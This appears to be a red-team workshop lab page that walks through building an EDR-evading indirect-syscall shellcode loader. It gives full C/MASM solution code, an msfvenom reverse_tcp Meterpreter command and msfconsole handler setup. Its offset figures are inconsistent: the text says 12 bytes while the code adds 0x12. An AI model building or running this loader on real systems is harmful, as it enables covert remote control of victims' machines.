Skip to content

14: Chapter 7 | LAB Exercise Playbook

VirtualAllocEx edited this page Jan 11, 2024 · 42 revisions

LAB Exercise 5: Indirect Syscall Loader

Related to the Win32-API loader, in this exercise we will make the third modification, creating the indirect syscall loader.

The main difference between the direct syscall loader and the indirect syscall loader is that only part of the syscall stub from a native function is implemented directly into the indirect syscall loader itself. This means that we implement and execute mov r10, rcx, mov eax, SSN and jmp qword ptr in the indirect syscall loader, but unlike the direct syscall loader, we do not execute the syscall and return from the indirect syscall loader's memory. Instead, we use an unconditional jump jmp qword ptr to jump to the syscall address of the native function in ntdll.dll and execute the syscall and return from the memory location of ntdll.dll. Why exactly this is an advantage over direct syscalls in terms of EDR evasion is discussed in detail in Chapter 8, where we compare the call stacks of our various shellcode loaders.

Prinicipal_indirect_syscalls

The code template for this tutorial can be found here.

Exercise Tasks:

Build Indirect Syscall Loader

Task Nr. Task Description
1 Download the indirect syscall loader POC for this chapter.
2 Most of the code is already implemented in the POC. However, you have to complete the indirect syscall loader by performing the following tasks:
  • Complete the code section to dynamically retrieve the start adress for each native function using the GetProcAdress API.
  • Complete the section of code that calculates the effective memory addresses for the syscall addresses.
  • Declare the three missing global variables to hold the calculated syscall instruction addresses.
  • Create a new header file syscalls.h and use the supplied code for syscalls.h, which follows in this playbook. Also include syscalls.h in the main code as header syscalls.h.
  • Import the syscalls.asm file as a resource and complete the assembly code by adding the missing assembler code for the remaining three native APIs following the scheme of the already implemented code for NtAllocateVirtualMemory.
  • Enable Microsoft Macro Assembler (MASM) in the indirect syscall POC in Visual Studio.
3 Create a staged x64 meterpreter shellcode with msfvenom, copy it to the POC and compile the POC.
4 Create and run a staged x64 meterpreter listener using msfconsole.
5 Run your compiled .exe and check that a stable command and control channel opens.

Analyse Indirect Syscall Loader

Task Nr. Task Description
6 Use the Visual Studio dumpbin tool to analyse the syscall loader. Are any Win32 APIs being imported from kernel32.dll? Is the result what you expected?
7 Use x64dbg to debug or analyse the loader.
  • Check which Win32 APIs and native APIs are being imported. If they are being imported, from which module or memory location are they being imported? Is the result what you expected?
  • Check from which module or memory location the syscalls for the four APIs used are being executed. Is the result what you expected?
  • etc.

Visual Studio

You can download the POC from the code section of this chapter. The code works as follows, shellcode declaration is done as before.

// Insert the Meterpreter shellcode as an array of unsigned chars (replace the placeholder with actual shellcode)
    unsigned char code[] = "\xfc\x48\x83";

Syscall and Return

As mentioned at the beginning of this chapter, we want to execute the syscall and return statements from the syscall stub of the native functions we are using from the memory of ntdll.dll. Therefore, we need to jump from the memory of the indirect syscall loader.exe to the syscall address of the corresponding native function in the memory of ntdll.dll at the right time. This is done by executing jmp qword ptr in the indirect syscall loader after mov r10, rcx and mov eax, SSN have been executed. To do this using Windows APIs, we need to do the following:

  • Open a handle to ntdll.dll at runtime using GetModuleHandleA.

  • Get the start address of the native function in ntdll.dll using GetProcAddress and store it in a variable declared as a function pointer.

  • Get the memory address of the syscall instruction in the syscall stub by adding the required offset and store it in a variable declared as a global variable.

Handle to ntdll.dll

First, we want to use the following code which uses the function GetModuleHandleA to open a handle to ntdll.dll at runtime. This code is already implemented in the indirect syscall POC.

Code
// Get a handle to the ntdll.dll library
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (hNtdll == NULL) {
        // Handle the error, for example, print an error message and return.
        printf("Error: the specified module could not be found.");
        return 1; // Or any other non-zero value, since typically a zero return indicates success
    }     

Start Address Native Function

Then we want to use the following code which uses the GetProcAddress function to get the start address of the respective native function in the memory of ntdll.dll and store it in a variable declared as a function pointer.

Task

In the indirect syscall POC, this code is implemented only for the native function NtAllocateVirtualMemory and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory which can be seen in the code section below.

Code
// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
    UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");     

If it was not possible for you to complete this code section, you can find the code in the following solution section.

Solution
// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
    UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    UINT_PTR pNtWriteVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    UINT_PTR pNtCreateThreadEx = (UINT_PTR)GetProcAddress(hNtdll, "NtCreateThreadEx");
    UINT_PTR pNtWaitForSingleObject = (UINT_PTR)GetProcAddress(hNtdll, "NtWaitForSingleObject");     

Memory Address Syscall Instruction

In the next step, we want to get the effective memory address from the syscall instruction in the syscall stub of the native function by adding the necessary offset to the start address of the native function that we retrieved in the previous step. To get the memory address from the syscall instruction, we need to add 12-bytes. Why exactly 12 bytes? This is the necessary offset calculated from the start address of the native function to get the address of the syscall instruction in the syscall stub.

02

Task

In the indirect syscall POC, this code is implemented only for the native function NtAllocateVirtualMemory and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory which can be seen in the code section below.

Code
// The syscall stub (actual system call instruction) is some bytes further into the function. 
    // In this case, it's assumed to be 0x12 (18 in decimal) bytes from the start of the function.
    // So we add 0x12 to the function's address to get the address of the system call instruction.
    sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;     

If it was not possible for you to complete this code section, you can find the code in the following solution section.

Solution
// The syscall stub (actual system call instruction) is some bytes further into the function. 
    // In this case, it's assumed to be 0x12 (18 in decimal) bytes from the start of the function.
    // So we add 0x12 to the function's address to get the address of the system call instruction.
    sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;
    sysAddrNtWriteVirtualMemory = pNtWriteVirtualMemory + 0x12;
    sysAddrNtCreateThreadEx = pNtCreateThreadEx + 0x12;
    sysAddrNtWaitForSingleObject = pNtWaitForSingleObject + 0x12;     

Global Variables

To store the memory address from the syscall instruction of the respective native function, and also to be able to provide the memory address later for the assembly code in the syscalls.asm file, we declare a global variable for each syscall address, which is declared as a pointer.

Task

Also in this case in the indirect syscall POC, this code is implemented only for the native function NtAllocateVirtualMemory and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory which can be seen in the code section below.

Code
// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;     

If it was not possible for you to complete this code section, you can find the code in the following solution section.

Solution
// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;
UINT_PTR sysAddrNtWriteVirtualMemory;
UINT_PTR sysAddrNtCreateThreadEx;
UINT_PTR sysAddrNtWaitForSingleObject;     

Header File

Like the direct syscall loader, we no longer ask ntdll.dll for the function definition of the native APIs we use. But we still want to use the native functions, so we need to define or directly implement the structure for all four native functions in a header file. In this case, the header file should be called syscalls.h.

Task

The syscalls.h file does not currently exist in the syscall POC folder, your task is to add a new header file named syscalls.h and implement the required code. The code for the syscalls.h file can be found in the code section below. You will also need to include the header syscalls.h in the main code.

Additional information if you want to check the function definition manually should be available in the Microsoft documentation, e.g. for NtAllocateVirtualMemory.

Details

image

Code
#ifndef _SYSCALLS_H  // If _SYSCALLS_H is not defined then define it and the contents below. This is to prevent double inclusion.
#define _SYSCALLS_H  // Define _SYSCALLS_H

#include <windows.h>  // Include the Windows API header

// The type NTSTATUS is typically defined in the Windows headers as a long.
typedef long NTSTATUS;  // Define NTSTATUS as a long
typedef NTSTATUS* PNTSTATUS;  // Define a pointer to NTSTATUS

// Declare the function prototype for NtAllocateVirtualMemory
extern NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,    // Handle to the process in which to allocate the memory
    PVOID* BaseAddress,      // Pointer to the base address
    ULONG_PTR ZeroBits,      // Number of high-order address bits that must be zero in the base address of the section view
    PSIZE_T RegionSize,      // Pointer to the size of the region
    ULONG AllocationType,    // Type of allocation
    ULONG Protect            // Memory protection for the region of pages
);

// Declare the function prototype for NtWriteVirtualMemory
extern NTSTATUS NtWriteVirtualMemory(
    HANDLE ProcessHandle,     // Handle to the process in which to write the memory
    PVOID BaseAddress,        // Pointer to the base address
    PVOID Buffer,             // Buffer containing data to be written
    SIZE_T NumberOfBytesToWrite, // Number of bytes to be written
    PULONG NumberOfBytesWritten // Pointer to the variable that receives the number of bytes written
);

// Declare the function prototype for NtCreateThreadEx
extern NTSTATUS NtCreateThreadEx(
    PHANDLE ThreadHandle,        // Pointer to a variable that receives a handle to the new thread
    ACCESS_MASK DesiredAccess,   // Desired access to the thread
    PVOID ObjectAttributes,      // Pointer to an OBJECT_ATTRIBUTES structure that specifies the object's attributes
    HANDLE ProcessHandle,        // Handle to the process in which the thread is to be created
    PVOID lpStartAddress,        // Pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread
    PVOID lpParameter,           // Pointer to a variable to be passed to the thread
    ULONG Flags,                 // Flags that control the creation of the thread
    SIZE_T StackZeroBits,        // A pointer to a variable that specifies the number of high-order address bits that must be zero in the stack pointer
    SIZE_T SizeOfStackCommit,    // The size of the stack that must be committed at thread creation
    SIZE_T SizeOfStackReserve,   // The size of the stack that must be reserved at thread creation
    PVOID lpBytesBuffer          // Pointer to a variable that receives any output data from the system
);

// Declare the function prototype for NtWaitForSingleObject
extern NTSTATUS NtWaitForSingleObject(
    HANDLE Handle,          // Handle to the object to be waited on
    BOOLEAN Alertable,      // If set to TRUE, the function returns when the system queues an I/O completion routine or APC for the thread
    PLARGE_INTEGER Timeout  // Pointer to a LARGE_INTEGER that specifies the absolute or relative time at which the function should return, regardless of the state of the object
);

#endif // _SYSCALLS_H  // End of the _SYSCALLS_H definition

  

Assembly Instructions

As in the direct syscall loader, we do not want to ask ntdll.dll for the syscall stub or the content or code of the syscall stub (assembly instructions mov r10, rcx, mov eax, SSN etc.) of the native functions we use, instead we have to implement the necessary assembly code in the assembly itself. But compared to the direct syscall loader, in the indirect syscall loader we only implement a part of the syscall stub directly. That is, we implement mov r10, rcx, mov eax, SSN, but we replace the syscall instruction with an unconditional jump instruction jmp qword ptr. This allows us to jump to the memory address of the syscall instruction in the memory of ntdll.dll, and the syscall and return instructions are executed in the memory of ntdll.dll.

Also in this case, instead of using a tool to create the necessary assembly instructions, for the best learning experience we will manually implement the assembly code in our indirect syscall POC. To do this, you will find a file called syscalls.asm in the indirect syscall loader POC directory, which contains some of the required assembler code. Compared to the direct syscall loader POC, in the syscalls.asm file of the indirect syscall loader POC, we need to be able to call the memory address of the respective syscall. This is necessary to realise the jump in the memory of ntdll.dll. This is done with the following code for the syscall instructions of NtAllocateVirtualMemory.

The code below shows the assembler code for the syscall stub of NtAllocateVirtualMemory which is already implemented in the syscalls.asm file.

Code
EXTERN sysAddrNtAllocateVirtualMemory:QWORD   ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
     
.CODE  ; Start the code section

; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx  ; Move the contents of rcx to r10. This is necessary because the syscall instruction in 64-bit Windows expects the parameters to be in the r10 and rdx registers.
    mov eax, 18h  ; Move the syscall number into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP  ; End of the procedure.     
     
END  ; End of the module     
     

Task

It is your task to add the syscalls.asm file as a resource (existing item) to the indirect syscall loader project and complete the assembler code and C code for the other three missing native APIs NtWriteVirtualMemory, NtCreateThreadEx and NtWaitForSingleObject.

If you are unable to complete the assembly code at this time, you can use the assembly code from the solution and paste it into the syscalls.asm file in the direct syscall loader POC. Note that the syscalls IDs are for Windows 10 Enterprise 22H2 and may not work for your target. You may need to replace the syscalls IDs with the correct syscalls IDs for your target Windows version.

Solution
EXTERN sysAddrNtAllocateVirtualMemory:QWORD         ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtWriteVirtualMemory:QWORD            ; The actual address of the NtWriteVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtCreateThreadEx:QWORD                ; The actual address of the NtCreateThreadEx syscall in ntdll.dll.
EXTERN sysAddrNtWaitForSingleObject:QWORD           ; The actual address of the NtWaitForSingleObject syscall in ntdll.dll.


.CODE  ; Start the code section

; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx                                    ; Move the contents of rcx to r10. This is necessary because the syscall instruction in 64-bit Windows expects the parameters to be in the r10 and rdx registers.
    mov eax, 18h                                    ; Move the syscall number into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP                     	; End of the procedure.


; Similar procedures for NtWriteVirtualMemory syscalls
NtWriteVirtualMemory PROC
    mov r10, rcx
    mov eax, 3Ah
    jmp QWORD PTR [sysAddrNtWriteVirtualMemory]
NtWriteVirtualMemory ENDP


; Similar procedures for NtCreateThreadEx syscalls
NtCreateThreadEx PROC
    mov r10, rcx
    mov eax, 0C2h
    jmp QWORD PTR [sysAddrNtCreateThreadEx]
NtCreateThreadEx ENDP


; Similar procedures for NtWaitForSingleObject syscalls
NtWaitForSingleObject PROC
    mov r10, rcx
    mov eax, 4
    jmp QWORD PTR [sysAddrNtWaitForSingleObject]
NtWaitForSingleObject ENDP

END  ; End of the module

Microsoft Macro Assembler (MASM)

We have already implemented all the necessary assembler code in the syscalls.asm file. But in order for the code to be interpreted correctly within the direct syscall POC, we need to do a few things. These steps are not done in the downloadable POC and must be done manually.

Task

First, we need to enable support for Microsoft Macro Assembler (MASM) in the Visual Studio project by enabling the option in Build Dependencies/Build Customisations.

Details

06 07

Task

We also need to set the item type of the syscalls.asm file to Microsoft Macro Assembler, otherwise we will get an unresolved symbol error in the context of the native APIs used in the direct syscall loader. We also set "Excluded from Build" to no and "Content" to yes.

Details

08 09 10

Meterpreter Shellcode

Task

Again, we will create our meterpreter shellcode with msfvenom in Kali Linux. To do this, we will use the following command and create x64 staged meterpreter shellcode.

kali>

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt

11

The shellcode can then be copied into the direct syscall loader POC by replacing the placeholder at the unsigned char, and the POC can be compiled as an x64 release.

12

MSF-Listener

Task

Before we test the functionality of our direct syscall loader, we need to create a listener within msfconsole.

kali>

msfconsole

msf>

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost IPv4_Redirector_or_IPv4_Kali
set lport 80 
set exitonsession false
run

13

Once the listener has been successfully started, you can run your compiled direct syscall loader. If all goes well, you should see an incoming command and control session.

14

Loader Analysis: Dumpbin

Task

The Visual Studio tool dumpbin can be used to check which Windows APIs are imported via kernel32.dll. The following command can be used to check the imports. Which results do you expect?

cmd>

cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
dumpbin /imports Path/to/Direct_Syscall_Dropper.exe
Results

No imports from the Windows APIs VirtualAlloc, WriteProcessMemory, CreateThread, and WaitForSingleObject from kernel32.dll. This was expected and is correct.

image

Loader Analysis: x64dbg

Task

The first step is to run your direct syscall loader, check that the .exe is running and that a stable meterpreter C2 channel is open. Then we open x64dbg and attach to the running process, note that if you open the indirect syscall loader directly in x64dbg, you need to run the assembly first.

image

image

Task

Then we want to check which APIs (Win32 or Native) are being imported and from which module or memory location. Remember that in the indirect syscall loader we no longer use Win32 APIs in the code and have implemented the structure for the native functions directly in the assembly. What results do you expect?

Results

Checking the imported symbols in our indirect syscall loader, we should again see that the Win32 APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are no longer imported by kernel32.dll, or are no longer imported in general. So the result is the same as with dumpbin and seems to be valid.

18

Also, looking at the imported symbols (symbols register), we see that instead of asking ntdll.dll for the code of the four required native functions NtAllocateVirutalMemory, NtWriteVirtualMemory, NtCreateThreadEx and NtWaitForSingleObject, these native functions are implemented directly in the .text region of the shellcode loader.

19

We use the "Follow in Disassembler" function to analyse the indirect syscall loader to identify the lines of code where the calls to the native functions are made.

20 21

We also want to identify the disassembled lines of code where GetModuleHandleA is used to open a handle to ntdll.dll and GetProcAdress is used to get the start address from the native function. We also want to identify the disassembled code where the address is calculated from the respective syscall by adding 12 bytes as an offset to the start address.

Results

We can identify the lines of code used to open a handle to ntdll.dll using GetModuleHandleA, then get the start address of the native functions using GetProcAdress, and finally calculate the address of the syscall instruction by adding 12 bytes as an offset to the start address of the respective native function.

22

Task

Also in the case of the indirect syscall loader we want to check in which module the syscall stub or the assembler instructions of the native functions are implemented and executed. Remember, unlike the direct syscall loader from the previous chapter, in the indirect syscall loader POC we have only implemented part of the syscall stub directly into the loader itself. What results do you expect?

Results

For example, in the context of the native function NtAllocateVirtualMemory, we use the "Follow in Disassembler" function and should be able to see that the syscall stub is not fetched from ntdll.dll, but in the case of the indirect syscall loader, only part of the assembly instructions are implemented directly into the .text section of the assembly. Furthermore, we can see that the unconditional jump to the memory of ntdll.dll is done via jmp qword ptr and that the syscall statement and the return statement are executed from the memory location of ntdll.dll.

23 24 25 26

Summary:

  • Made transition from direct syscalls to indirect syscalls
  • Loader imports no longer Windows APIs from kernel32.dll
  • Loader imports no longer Native APIs from ntdll.dll
  • Only a part of the syscall stub is directly implemented into .text section of the shellcode loader
  • The syscall and return statements are executed from the memory of the ntdll.dll.
  • User mode hooks in ntdll.dll and EDR can be bypassed
  • EDR detection based on checking the syscall and return address in the call stack can be bypassed.

Limitations

  • System Service Numbers (SSNs) are hard-coded into the POC.
  • If one or more of the Native APIs used are hooked by the EDR, depending on the EDR, the execution of the shellcode is likely to fail.
  • If an EDR uses Event Tracing for Windows (ETW) or Event Tracing for Windows Threat Intelligence (EtwTi) to check the entire call stack, rather than just the memory area from which the syscall was executed and/or the return address, then indirect syscalls are likely to fail.